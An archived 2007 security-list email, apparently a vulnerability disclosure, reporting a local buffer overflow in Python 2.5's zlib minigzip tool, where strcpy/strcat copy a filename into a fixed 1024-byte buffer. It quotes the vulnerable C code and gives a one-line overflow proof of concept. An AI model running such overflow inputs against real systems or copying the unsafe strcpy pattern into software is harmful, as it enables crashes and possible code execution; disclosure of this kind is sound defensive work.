[From nobody Wed Mar 14 16:25:35 2007
Return-Path: <cyrus@fezzik>
Received: from fezzik ([unix socket]) (authenticated user=mailinglists bits=0)
	by fezzik (Cyrus v2.1.18-IPv6-Debian-2.1.18-1) with LMTP;
	Wed, 14 Mar 2007 17:49:48 +0200
X-Sieve: CMU Sieve 2.2
Return-Path: <starcadi@gmail.com>
Received: from houseofcards.securiteam.com (securiteam.com [192.117.232.213])
	by fezzik.beyondsecurity.com (Postfix) with SMTP id 311D92080EE
	for <news@mail.beyondsecurity.com>;
	Wed, 14 Mar 2007 17:49:37 +0200 (IST)
Received: (qmail 22420 invoked by uid 501); 14 Mar 2007 16:22:57 -0000
Delivered-To: aviram-securiteam-news@securiteam.com
Received: (qmail 22417 invoked from network); 14 Mar 2007 16:22:56 -0000
Received: from an-out-0708.google.com (209.85.132.244)
	by 0 with SMTP; 14 Mar 2007 16:22:56 -0000
Received: by an-out-0708.google.com with SMTP id c3so211764ana
	for <news@securiteam.com>; Wed, 14 Mar 2007 08:49:36 -0700 (PDT)
DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta;
	h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type;
	b=bO3vXYkYsHQKDuwXiHmdsZFM/1DkSR0EpwCxMS7xQTYRbMok64V9wG8nf6n1E093TRNuFsq11shJKZR0Ubuhfg9lfULxd2JC3iw8XYAmtqH5731Ams0Y2CRmmi0SFd4JBJM3D1zrK3Cqhz1BM5VN3vt12NDY4bh98Ig+z46lr5A=
DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta;
	h=received:message-id:date:from:to:subject:mime-version:content-type;
	b=fexk+J5LnTAfo2V0H/N6qNP/8oeSVLecSjRGzmLA4WUkjUujGNZKIcD6k65mx5Qn8b+oKAWUXr7SaYcyT8CmKqNKxROR7agi1YuUUutlg3j4iP9LwScXeuDOGDoXZcmhiXKb3WtxACutEwNRTYEC+bZmpQ8ENUEzifoLxEyjlX8=
Received: by 10.100.138.2 with SMTP id l2mr2078887and.1173887376906;
	Wed, 14 Mar 2007 08:49:36 -0700 (PDT)
Received: by 10.100.174.7 with HTTP; Wed, 14 Mar 2007 08:49:36 -0700 (PDT)
Message-ID: <db4e96660703140849n3780625dqdf168acb65b7ea22@mail.gmail.com>
Date: Wed, 14 Mar 2007 16:49:36 +0100
From: "starcadi starcadi" <starcadi@gmail.com>
To: news@securiteam.com
Subject: Python 2.5 (Modules/zlib) minigzip local buffer overflow vulnerability
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_Part_47476_5356580.1173887376842"
X-Spam-Checker-Version: SpamAssassin 3.0.3 (2005-04-27) on fezzik
X-Spam-Level: 
X-Spam-Status: No, score=-1.9 required=6.0 tests=BAYES_20,HTML_MESSAGE,
	RCVD_BY_IP autolearn=ham version=3.0.3
X-UID: 27493
X-Length: 5627

------=_Part_47476_5356580.1173887376842
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Description:

The source of python contain a various modules, the zlib module contain a
minigzip tool, ( * minigzip is a minimal implementation of the gzip utility.).

Source error:

the error was found in:
- void file_compress(file, mode)
because the use of strcpy() is inapropriatly

--
#define MAX_NAME_LEN 1024
[..]
void file_compress(file, mode)
    char  *file;
    char  *mode;
{
    local char outfile[MAX_NAME_LEN];
    FILE  *in;
    gzFile out;

    strcpy(outfile, file);
    strcat(outfile, GZ_SUFFIX);
--

the function file_compress() was called by main() function.

Proof of concept:

if you want test the vulnerability try:
$ minigzip `perl -e "print 'A'x1050"`

-- starcadi

------=_Part_47476_5356580.1173887376842
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

<span style="font-weight: bold;">Description:</span><br><br>The source of python contain a various modules, the zlib module contain a minigzip tool, ( * <span style="text-decoration: underline;">minigzip is a minimal implementation of the gzip utility.
</span> ).<br><br><span style="font-weight: bold;">Source error:</span><br><br>the error was found in:<br>- <span style="font-style: italic;">void file_compress(file, mode)</span><br>because the use of strcpy() is inapropriatly
<br><br><span style="font-style: italic;">--</span><br style="font-style: italic;"><span style="font-style: italic;">#define MAX_NAME_LEN 1024</span><br style="font-style: italic;"><span style="font-style: italic;">[..]</span>
<br style="font-style: italic;"><span style="font-style: italic;">void file_compress(file, mode)</span><br style="font-style: italic;"><span style="font-style: italic;">    char  *file;</span><br style="font-style: italic;">
<span style="font-style: italic;">    char  *mode;</span><br style="font-style: italic;"><span style="font-style: italic;">{</span><br style="font-style: italic;"><span style="font-style: italic;">    local char outfile[MAX_NAME_LEN];
</span><br style="font-style: italic;"><span style="font-style: italic;">    FILE  *in;</span><br style="font-style: italic;"><span style="font-style: italic;">    gzFile out;</span><br style="font-style: italic;"><br style="font-style: italic;">
<span style="font-style: italic;">    strcpy(outfile, file);</span><br style="font-style: italic;"><span style="font-style: italic;">    strcat(outfile, GZ_SUFFIX);</span><br style="font-style: italic;"><span style="font-style: italic;">
--</span><br><br>the function <span style="font-style: italic;">file_compress()</span> was called by main() function.<br><br><span style="font-weight: bold;">Proof of concept:</span><br><br>if you want test the vulnerability try:
<br><span style="font-style: italic;">$ minigzip `perl -e "print 'A'x1050"`<br><br></span>-- starcadi<br>

------=_Part_47476_5356580.1173887376842--


]